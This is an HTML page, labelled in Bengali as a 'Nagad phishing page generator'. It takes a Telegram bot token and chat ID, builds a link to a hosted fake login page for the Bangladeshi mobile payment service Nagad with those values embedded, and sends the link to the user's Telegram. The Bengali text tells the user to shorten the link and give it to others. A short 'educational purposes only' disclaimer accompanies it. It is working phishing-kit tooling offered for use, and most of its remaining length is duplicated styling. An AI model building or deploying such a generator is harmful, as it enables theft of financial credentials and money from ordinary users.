<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
   <link rel="shortcut icon" href="https://i.ibb.co/n0yL4dR/1679248787-Nagad-Logo-1.png" />
  <meta property="og:title" content="নগদ ফি-শিং পেজ জেনারেটর।" />
  <meta property="og:description" content="নগদ ফি-শিং পেজ জেনারেটর।" />
  <meta property="og:image" content="https://i.ibb.co/KWjcfSF/Nagad-Hacked.jpg" />
  <meta name="robots" content="noindex, nofollow">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>নগদ ফি-শিং জেনারেটর</title>
    <style>
    	@keyframes fadeIn {
    from { opacity: 0; transform: translateY(-20px); }
    to { opacity: 1; transform: translateY(0); }
}

@keyframes buttonHover {
    from { background-color: rgba(238, 70, 43, 0.5); }
    to { background-color: rgba(238, 70, 43, 0.8); }
}

body {
    background-color: #fafafa;
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
    display: flex;
    flex-direction: column;
    justify-content: flex-start;
    align-items: center;
    height: 100vh;
    padding-top: 20px;
    overflow: auto;
    overflow: hidden;
    
}
.logo {
    text-align: center;
    margin-bottom: 10px;
    animation: fadeIn 1s ease-in-out;
}
.logo img {
    max-width: 110px;
}
.container {
    background-color: #fafafa;
    padding: 20px;
    border-radius: 10px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
    width: 300px;
    text-align: center;
    animation: fadeIn 1.5s ease-in-out;
}
.title {
    margin-bottom: 10px;
    position: relative;
}
.title::after {
    content: "";
    display: block;
    width: 100%;
    height: 2px;
    background-color: #C70039;
    position: absolute;
    bottom: -5px;
    left: 0;
}
.input-group {
    margin-bottom: 15px;
    text-align: left;
    animation: fadeIn 2s ease-in-out;
}
input[type="text"],
input[type="number"] {
    width: 100%;
    padding: 10px;
    border: 1px solid #CCCCCC;
    border-radius: 5px;
    box-sizing: border-box;
    font-family: Arial, sans-serif;
    transition: border-color 0.3s, box-shadow 0.3s;
}
input[type="text"]::placeholder,
input[type="number"]::placeholder {
    font-family: Arial, sans-serif;
    color: #999999;
}
input:focus {
    border-color: #ee462b;
    box-shadow: 0 0 5px rgba(238, 70, 43, 0.5);
    outline: none;
}
input.invalid {
    border-color: red;
}
#loginButton {
    background-color: transparent;
    color: #ee462b;
    border: 2px solid #ee462b;
    padding: 8px 15px; 
    border-radius: 20px; 
    cursor: pointer;
    width: 100%;
    display: flex;
    justify-content: center; 
    align-items: center;
    font-family: Arial, sans-serif;
    font-size: 17px;
    transition: background-color 0.3s, transform 0.3s;
    animation: fadeIn 2.5s ease-in-out;
}
#loginButton:hover {
    background-color: rgba(238, 70, 43, 0.5);
    animation: buttonHover 0.3s forwards;
    transform: translateY(-2px);
}
.footer {
    margin-top: 20px;
    text-align: center;
    color: #ee462b;
    font-size: 14px;
    animation: fadeIn 3s ease-in-out;
}
.footer a {
    color: #ee462b;
    text-decoration: none;
}
.footer a:hover {
    text-decoration: underline;
}
@keyframes fadeIn {
    from { opacity: 0; transform: translateY(-20px); }
    to { opacity: 1; transform: translateY(0); }
}

@keyframes buttonHover {
    from { background-color: rgba(238, 70, 43, 0.5); }
    to { background-color: rgba(238, 70, 43, 0.8); }
}

body {
    background-color: #fafafa;
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
    display: flex;
    flex-direction: column;
    justify-content: flex-start;
    align-items: center;
    height: 100vh;
    padding-top: 50px;
}
.logo {
    text-align: center;
    margin-bottom: 10px;
    animation: fadeIn 1s ease-in-out;
}
.logo img {
    max-width: 110px;
}
.container {
    background-color: #fafafa;
    padding: 20px;
    border-radius: 10px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
    width: 300px;
    text-align: center;
    animation: fadeIn 1.5s ease-in-out;
}
.title {
    margin-bottom: 10px;
    position: relative;
}
.title::after {
    content: "";
    display: block;
    width: 100%;
    height: 2px;
    background-color: #ee462b;
    position: absolute;
    bottom: -5px;
    left: 0;
}
.input-group {
    margin-bottom: 15px;
    text-align: left;
    animation: fadeIn 2s ease-in-out;
}
input[type="text"],
input[type="number"] {
    width: 100%;
    padding: 10px;
    border: 1px solid #ee462b;
    border-radius: 5px;
    box-sizing: border-box;
    font-family: Arial, sans-serif;
    transition: border-color 0.3s, box-shadow 0.3s;
}
input[type="text"]::placeholder,
input[type="number"]::placeholder {
    font-family: Arial, sans-serif;
    color: #999999;
}
input:focus {
    border-color: #ee462b;
    box-shadow: 0 0 5px rgba(238, 70, 43, 0.5);
    outline: none;
}
input.invalid {
    border-color: red;
}
#loginButton {
    background-color: transparent;
    color: #ee462b;
    border: 2px solid #ee462b;
    padding: 8px 15px; 
    border-radius: 20px; 
    cursor: pointer;
    width: 100%;
    display: flex;
    justify-content: center; 
    align-items: center;
    font-family: Arial, sans-serif;
    font-size: 20px;
    transition: background-color 0.3s, transform 0.3s;
    animation: fadeIn 2.5s ease-in-out;
}
#loginButton:hover {
    background-color: rgba(238, 70, 43, 0.5);
    animation: buttonHover 0.3s forwards;
    transform: translateY(-2px);
}
.footer {
    margin-top: 20px;
    text-align: center;
    color: #000000;
    font-size: 14px;
    animation: fadeIn 3s ease-in-out;
}
.footer a {
    color: #ee462b;
    text-decoration: none;
}
.footer a:hover {
    text-decoration: underline;
}
</style>
</head>
<body>
    <div class="logo">
        <img src="https://i.ibb.co/wJz2fPb/IMG-20240718-164357-removebg-preview-1.png" alt="Nagad Logo">
    </div>
    <div class="container">
        <h2 class="title">নগদ ফি-শিং জেনারেটর</h2>
        <br>
        <div class="input-group">
            <p>Enter Telegram Token</p>
            <input type="text" placeholder="TG token " id="telegramToken">
        </div>
        <div class="input-group">
            <p>Enter Chat ID</p>
            <input type="number" placeholder="Ex: 5080596463" id="chatId">
        </div>
        <br>
        	<br>
        <button id="loginButton">Generate</button>
    </div>
    <div class="footer">
    Developed by <a href="https://sujon0xff.github.io/" target="_blank">Sujon Islam</a>
   | Join our <a href="https://t.me/Freedom369_4u" target="_blank">Telegram Channel</a>
</div>
    <script>
    		
        document.getElementById('loginButton').addEventListener('click', function() {
    const token = document.getElementById('telegramToken').value;
    const chatId = document.getElementById('chatId').value;
    
    if (token && chatId) {
        const link = `🎣<b>Nagad Phishing page:-</b>https://sujon0xff.github.io/nagad-web/login.html?token=${token}&id=${chatId}`;
        
        const message = `🔗 <b><u>এটা হচ্ছে আপনার পেজ লিংক:</u></b>

${link}

<blockquote>🔖 উপরের যেই পেজ লিংকটা আছে, সেটা শর্ট করে আপনি অন্যকে দিন।</blockquote>

<b>Shorten your link here: https://t.ly/</b>

<blockquote>⚠️এটি শুধু শিক্ষামূলক উদ্দেশ্যে বানানো হয়েছে। দয়া করে কেউ কারো ক্ষতি করার উদ্দেশ্যে এটি ব্যবহার করবেন না।</blockquote>`;

        fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                chat_id: chatId,
                text: message,
                parse_mode: 'HTML'
            })
        })
        .then(response => response.json())
        .then(data => {
            if (data.ok) {
                alert('লিংক আপনার টেলিগ্রাম এ পাঠিয়ে দেওয়া হয়েছে!');
            } else {
                alert('Failed to send link: ' + data.description);
            }
        })
        .catch(error => {
            alert('Error sending link: ' + error.message);
        });
    } else {
        alert('Please enter both Telegram Token and Chat ID.');
    }
});
       
    </script>
</body>
</html>
